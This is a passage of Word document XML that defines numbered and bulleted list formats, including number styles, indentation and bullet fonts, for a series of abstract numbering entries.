    <w:tmpl w:val="A0AA45D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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="564A0DE1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="3AEE1FA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DA6C1D9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="927" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="964EB250">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="41AA73A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="534628C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AB1E426C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9AE4AD78">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="82A8FB72">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="07246812">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="97" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="56EA1F14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="46C8C1B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1FB0FFC6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17904874">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FE20B1B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8898D4FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2D2EC1DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F014B856">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6F688516">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2B92CB5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="98" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="57BC0A97"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1766A52"/>
    <w:lvl w:ilvl="0" w:tplc="664CEAD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720"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59461FA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2704C66"/>
    <w:lvl w:ilvl="0" w:tplc="5A18A0E8">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C243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10C5D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D2F97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10CB4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5ADBD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50AE4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7624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5EF75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5A2332AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="E80CC700">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C71ACBF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7F1CFBDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2C2AA474">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6178BE16">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C14E5106">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EB606EA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="70C244F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D2EAEB2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="101" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C7251AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FB45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D357C99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="99ACE1EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C882A6E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="715A24CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F03829FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BD3EA992">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CFCC7FF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F002355E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B4A48978">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4984B55C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="103" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F5B7E93"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7966B01C">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B07E3EBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7D303FE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CC427434">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="52CA9952">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4A006F5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="45C61068">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EA9E303E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0B869944">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="104" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="60624DFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B808140"/>
    <w:lvl w:ilvl="0" w:tplc="80F4AEA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9B9E870A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17BCF00E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="EBB06D5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CB04D564">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D95C263C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5966142C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3A60F9AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C8A0515C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="105" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61F427AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D6A61FA"/>
    <w:lvl w:ilvl="0" w:tplc="2542B972">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BA10A3CE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="PMingLiU" w:hAnsi="Wingdings" w:cs="Times New Roman"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62701D4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D91EF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34C18D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C3CB118"/>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63656E83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="DAD004C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C1F67BF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="38AED1FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6E9CBB10">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0D54CB2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="43EC0E66">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B92A1BC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="51ACAB18">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2EEA1DEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="109" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="64195F9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="64736C54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1CB48D3A"/>
    <w:lvl w:ilvl="0" w:tplc="60AE7426">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="331C22D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D17070A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0B760CDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D660CCCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DF3C9600">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E874419A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="35EAB6F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="158E70EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="111" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="65595F72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="AE848048">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CB480372">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="86A4A2DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C8E44560">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EBB28D3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="60D2ACB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="83CCACB2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D0DE7DC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DA00C396">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="112" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="667865EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
